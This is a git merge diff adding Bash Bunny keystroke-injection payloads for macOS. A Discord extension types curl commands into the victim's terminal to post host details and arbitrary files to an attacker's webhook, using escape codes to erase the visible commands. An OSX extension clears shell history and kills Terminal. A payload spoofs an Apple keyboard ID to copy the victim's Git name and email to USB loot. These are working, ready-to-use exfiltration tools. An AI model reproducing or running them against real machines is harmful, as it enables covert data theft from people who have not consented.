Merge pull request #650 from quentinlamamy/master
Submit Discord exfiltration extension + Github Information Exfiltration Payloadpull/252/merge
commit
257081013d
|
@ -0,0 +1,86 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Discord Extension
|
||||
# Description: Interact with discord webhook to exfiltrate text or files
|
||||
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||
# Version: 1.0
|
||||
# Category: Extension
|
||||
#
|
||||
# To use this extension, you need to create a webhook on discord and get the webhook id and token
|
||||
# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
|
||||
# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
|
||||
# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"
|
||||
|
||||
function DISCORD() {
|
||||
|
||||
case $1 in
|
||||
|
||||
# @desc Initialize the exfiltration session by posting an embed message on discord with host information
|
||||
# @usage DISCORD INIT
|
||||
# @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
|
||||
"INIT")
|
||||
|
||||
curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
|
||||
curl_header="Content-Type: application/json"
|
||||
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "curl --location '$curl_location'"
|
||||
Q STRING " --header '$curl_header'"
|
||||
Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_OS}'"
|
||||
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_IP_V4}'"
|
||||
Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_IP_V6}'"
|
||||
Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
|
||||
Q STRING "'\${BB_HOST_USER}'"
|
||||
Q STRING "\",\"inline\":true}]"
|
||||
Q STRING "}]}'"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
|
||||
;;
|
||||
|
||||
"SEND")
|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Send a message to discord via webhook
|
||||
# @usage DISCORD SEND MSG $yourMessage
|
||||
"MSG")
|
||||
|
||||
if [[ "$3" == *"$"* ]]; then
|
||||
message="'$3'"
|
||||
else
|
||||
message=$3
|
||||
fi
|
||||
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Send a file to discord via webhook
|
||||
# @usage DISCORD SEND FILE $yourFilePath
|
||||
"FILE")
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
esac
|
||||
}
|
||||
|
||||
export -f DISCORD
|
|
@ -0,0 +1,278 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: OSX Extension
|
||||
# Description: Allow a bunch of osx interaction
|
||||
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||
# Version: 2.0
|
||||
# Category: Extension
|
||||
|
||||
function OSX() {
|
||||
|
||||
case $1 in
|
||||
|
||||
"TERMINAL")
|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Open a terminal
|
||||
# @usage OSX TERMINAL OPEN
|
||||
"OPEN")
|
||||
Q GUI SPACE
|
||||
Q STRING terminal
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Initialize the terminal
|
||||
# Make the PS1 nicer (just because I like it)
|
||||
# Grab Host information and store it in BB_OSX vars
|
||||
# @usage OSX TERMINAL INIT
|
||||
# @info This command need a focused terminal
|
||||
"INIT")
|
||||
|
||||
Q STRING "bash"
|
||||
Q ENTER
|
||||
Q STRING "clear"
|
||||
Q ENTER
|
||||
Q STRING "printf '\e7'"
|
||||
Q ENTER
|
||||
Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
|
||||
Q ENTER
|
||||
Q STRING 'BB_HOST_USER=$(whoami)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING 'BB_HOST_NAME=$(hostname)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING "BB_HOST_OS='OSX'"
|
||||
Q ENTER
|
||||
|
||||
Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING "printf '\e8\e[1A\e[0J'"
|
||||
Q ENTER
|
||||
|
||||
;;
|
||||
|
||||
# @desc Minimize the terminal
|
||||
# @usage OSX TERMINAL MINIMIZE
|
||||
# @info This command need a focused terminal
|
||||
"MINIMIZE")
|
||||
Q STRING 'printf \e[2t'
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Resize the focused terminal
|
||||
# @usage OSX TERMINAL RESIZE $width $height
|
||||
# @param <integer> $width The terminal width
|
||||
# @param <integer> $height The terminal height
|
||||
# @info This command need a focused terminal
|
||||
"RESIZE")
|
||||
Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Clear the focused terminal
|
||||
# @usage OSX TERMINAL ZOOM
|
||||
# @info This command need a focused terminal
|
||||
"CLEAR")
|
||||
Q STRING clear
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Close all terminal
|
||||
# @usage OSX TERMINAL CLOSE
|
||||
# @info This command need a focused terminal
|
||||
"CLOSE")
|
||||
Q STRING history -c
|
||||
Q ENTER
|
||||
Q STRING killall Terminal
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Change terminal window name
|
||||
# @usage OSX TERMINAL NAME <WINDOW_NAME>
|
||||
# @info This command need a focused terminal
|
||||
"NAME")
|
||||
Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
"NETWORK")
|
||||
|
||||
case $2 in
|
||||
|
||||
"WIFI")
|
||||
|
||||
case $3 in
|
||||
|
||||
# @desc Enable wifi
|
||||
# @usage OSX NETWORK WIFI ENABLE
|
||||
"ENABLE")
|
||||
Q STRING "networksetup -setairportpower en0 on"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Disable wifi
|
||||
# @usage OSX NETWORK WIFI DISABLE
|
||||
"DISABLE")
|
||||
Q STRING "networksetup -setairportpower en0 off"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Connect to a wifi network
|
||||
# @usage OSX NETWORK CONNECT $ssid $password
|
||||
# @arg <string> Wifi SSID
|
||||
# @arg <string> Wifi Password
|
||||
"CONNECT")
|
||||
Q STRING "networksetup -setairportnetwork en0 $4 $5"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
"ETHERNET")
|
||||
;;
|
||||
|
||||
esac
|
||||
;;
|
||||
|
||||
"SESSION")
|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Shutdown the computer
|
||||
# @usage OSX SESSION SHUTDOWN
|
||||
"SHUTDOWN")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Restart the computer
|
||||
# @usage OSX SESSION RESTART
|
||||
"RESTART")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to restart'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Lock the computer
|
||||
# @usage OSX SESSION LOCK
|
||||
"LOCK")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Logout current session
|
||||
# @usage OSX SESSION LOGOUT
|
||||
"LOGOUT")
|
||||
Q STRING "osascript -e 'tell app \"System Events\" to log out'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
"GET_USER")
|
||||
#Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
|
||||
Q STRING 'BB_OSX_USER=$(whoami)'
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
"SOUND")
|
||||
|
||||
case $2 in
|
||||
|
||||
"PLAY")
|
||||
Q STRING "afplay $3"
|
||||
;;
|
||||
|
||||
# @desc Change the computer volume
|
||||
# @usage OSX MISC VOLUME $volumeValue
|
||||
# @arg <integer> An integer between 0 and 10
|
||||
"VOLUME")
|
||||
Q STRING "osascript -e 'set Volume $3'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
;;
|
||||
|
||||
"NOTIFICATION")
|
||||
|
||||
case $2 in
|
||||
|
||||
"CLEAR")
|
||||
Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
"DISPLAY")
|
||||
|
||||
if [ -z $6]; then
|
||||
$6=${1:-"Purr"}
|
||||
fi
|
||||
|
||||
Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
|
||||
;;
|
||||
|
||||
"MISC")
|
||||
|
||||
case $2 in
|
||||
|
||||
# @desc Show or hide desktop icon
|
||||
# @usage OSX MISC DESKTOP_ICON $action
|
||||
# @arg <string> HIDE | void
|
||||
"DESKTOP_ICON")
|
||||
if [ $3 == "HIDE" ]; then
|
||||
Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
|
||||
Q ENTER
|
||||
else
|
||||
Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
|
||||
Q ENTER
|
||||
fi
|
||||
;;
|
||||
|
||||
# @desc Change wallpaper with the specified url image
|
||||
# @usage OSX MISC WALLPAPER_URL
|
||||
"WALLPAPER_URL")
|
||||
Q STRING "cd ~/Desktop"
|
||||
Q ENTER
|
||||
Q STRING "curl $3 > img.bb"
|
||||
Q ENTER
|
||||
Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
# @desc Say something in the way of bigben
|
||||
# @usage OSX MISC SAY <VOICE> <TEXT_TO_SAY>
|
||||
# @info Need a focused terminal
|
||||
"SAY")
|
||||
Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
|
||||
Q ENTER
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
;;
|
||||
|
||||
esac
|
||||
|
||||
}
|
||||
|
||||
export -f OSX
|
|
@ -0,0 +1,30 @@
|
|||
<div align="center">
|
||||
|
||||
# Github Information Exfiltration
|
||||
**Get Git user name and email from the Git global config and exfiltrate them**
|
||||
|
||||
![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white)
|
||||
![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white)
|
||||
|
||||
![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black)
|
||||
|
||||
</div>
|
||||
|
||||
<img width="1000" alt="banner" src="https://raw.githubusercontent.com/quentinlamamy/bashbunny/main/img/githubExfiltration.jpg"/>
|
||||
|
||||
# Dependency
|
||||
|
||||
* OSX Extension by quentin_lamamy
|
||||
|
||||
# Changelog
|
||||
v1.0 :
|
||||
* :tada: Release on 2023/08/20
|
||||
|
||||
# Contributing
|
||||
A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues)
|
||||
|
||||
# License
|
||||
<p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://github.com/quentinlamamy/bashbunny/blob/main/payloads/githubExfiltration/payload.txt">Github Infos Exfiltration Payload</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://github.com/quentinlamamy">Quentin Lamamy</a> is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-NC-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/nc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg?ref=chooser-v1"></a></p>
|
||||
|
||||
# Support
|
||||
<a href="https://www.buymeacoffee.com/quentinlamamy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>
|
|
@ -0,0 +1,58 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: OSX Payload to exfiltrate Git user name and email
|
||||
# Description: Get Git user name and email from the Git global config and exfiltrate them
|
||||
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
|
||||
# Version: 1.0
|
||||
# Category: Exfiltration
|
||||
# Attackmodes: HID STORAGE
|
||||
# Target OS: OSX
|
||||
# Dependency: OSX Extensions
|
||||
#
|
||||
# Magenta solid Setup
|
||||
# Yellow single blink Attack in progress
|
||||
# Yellow double blink Sync
|
||||
# Yellow triple blink Cleanup
|
||||
# Green blink then solid Finished
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250
|
||||
|
||||
OSX TERMINAL OPEN
|
||||
|
||||
Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)'
|
||||
Q ENTER
|
||||
Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt'
|
||||
Q ENTER
|
||||
Q STRING 'touch $lootPath'
|
||||
Q ENTER
|
||||
|
||||
LED ATTACK
|
||||
|
||||
# Get the user name from the Git global config
|
||||
Q STRING 'user_name=$(git config --global user.name)'
|
||||
Q ENTER
|
||||
|
||||
# Get the user email from the Git global config
|
||||
Q STRING 'user_email=$(git config --global user.email)'
|
||||
Q ENTER
|
||||
|
||||
Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath'
|
||||
Q ENTER
|
||||
|
||||
# Sync
|
||||
LED STAGE 2
|
||||
sync
|
||||
|
||||
# Cleanup
|
||||
LED STAGE 3
|
||||
|
||||
# Eject
|
||||
QUACK STRING 'diskutil eject $last_mounted_volume'
|
||||
QUACK ENTER
|
||||
DELAY 100
|
||||
|
||||
OSX TERMINAL CLOSE
|
||||
|
||||
LED FINISH
|
Loading…
Reference in New Issue